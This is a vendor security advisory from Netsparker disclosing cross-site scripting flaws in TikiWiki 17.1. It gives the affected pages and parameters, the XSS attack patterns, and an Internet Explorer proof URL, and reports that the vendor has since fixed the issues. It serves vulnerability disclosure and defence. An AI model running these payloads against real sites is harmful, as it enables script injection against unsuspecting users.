Information
--------------------
Advisory by Netsparker
Name: Cross-site Scripting Vulnerabilities in TikiWiki
Affected Software: TikiWiki
Affected Versions: 17.1
Homepage: https://tiki.org/tiki-index.php
Vulnerability: Cross-site Scripting  Vulnerabilities
Severity: High
Status: Fixed
Netsparker Advisory Reference: NS-18-010

Technical Details
--------------------

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name  dbhost
Parameter Type  POST
Attack Pattern  %3cscRipt%3enetsparker(0x0023B8)%3c%2fscRipt%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name  dbhost
Parameter Type  POST
Attack Pattern  %3cscRipt%3enetsparker(0x005AF2)%3c%2fscRipt%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php
Parameter Name  email_test_to
Parameter Type  POST
Attack Pattern  %3cscRipt%3enetsparker(0x001E5A)%3c%2fscRipt%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name  email_test_to
Parameter Type  POST
Attack Pattern  %3cscRipt%3enetsparker(0x0023B5)%3c%2fscRipt%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name  dbuser
Parameter Type  POST
Attack Pattern  %3cscRipt%3enetsparker(0x005AF6)%3c%2fscRipt%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php
Parameter Name  dbhost
Parameter Type  POST
Attack Pattern  %3cscRipt%3enetsparker(0x001E5C)%3c%2fscRipt%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?'"--></style></scRipt><scRipt>netsparker(0x0015D8)</scRipt> (IE ONLY)
Notes  For successful exploitation, payload may need to be sent without URL encoding. Modern browsers will encode the HTML tags in the request before it is being sent to the webserver, however it is still possible in Internet Explorer.
Proof URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?'"--></style></scRipt><scRipt>alert(0x0015D8)</scRipt>
Parameter Name  Query Based
Parameter Type  Query String
Attack Pattern  '"--></style></scRipt><scRipt>netsparker(0x0015D8)</scRipt>

URL  http://app.scan/ScanApp/tiki-17.1/tiki-install.php
Parameter Name  email_test_to
Parameter Type  POST
Attack Pattern  x%22+onmouseover%3dnetsparker(0x0015DC)+x%3d%22

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

5th October 2017 - First Contact
1st March 2018 - Vendor Fixed
12th July 2018 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.